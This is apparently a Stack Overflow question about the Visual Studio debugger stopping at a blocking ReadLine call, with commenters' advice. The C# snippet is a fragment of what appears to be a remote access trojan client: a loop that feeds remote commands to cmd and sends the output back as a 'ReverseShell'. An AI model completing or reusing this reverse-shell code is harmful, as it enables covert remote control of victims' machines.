# I have a problem with the Debugger in Visual Studio 2022

Tags: c#, task, visual-studio-debugging

I have set debugging points for each line in the code below. But for some reason Visual Studio stops debugging after it gets to the following line:

```
string standardError = cmd.StandardError.ReadLine().Trim(' ');
```

The code:

```
 await Task.Run(async () =>
                {
                    while (hasStarted)
                    {
                        if (data.Contains("§close§") || RATClientSession.noConnection)
                        {
                            hasStarted = false;
                            cmd.Kill();
                        }
                        if (data.Length > 1 && data != checkIfDataIsNew)
                        {
                            cmd.StandardInput.WriteLine(data);
                            data = checkIfDataIsNew;
                        }

                        string standardError = cmd.StandardError.ReadLine().Trim(' ');
                        string standarOutput = cmd.StandardOutput.ReadLine().Trim(' ');

                        if (standardError.Length == 0)
                            await RATClientSession.SendData(standarOutput + "§ReverseShell§\n");
                        else
                            await RATClientSession.SendData(standardError + "§ReverseShell§\n");
                    }
                });
```

I tried to make `StandardOutput` and `StandardInput` not send data at the same time. But for some reason it's not working. And I can't debug it because of the debugging problem I explained earlier. Is there any chance the task could be the problem. Any other suggestions?

Comment: Show us your `Process`/`ProcessStartInfo` code.

Comment: **Don't** use `.ReadLine()` with `StandardError` or `StandardOutput` because there is no guarantee that a process will ever write `\n`, so your program will be stuck waiting for something that might never come.

Comment: Do you recomend Read() then?

Comment: Btw the proces is comand prompt? And from my earlier projects it has worked with ReadLine using comand prompt. Would Comand prompt be fine?

Comment: Are you sure there is any output written to stderr at all?

Comment: Klaus Gutter yes Im certain because when I didnt make it a variable in just sent the readline it worked perfectly fine.

Comment: The code you provided cannot reproduce the problem. You should [create a Minimal, Reproducible Example](https://stackoverflow.com/help/minimal-reproducible-example)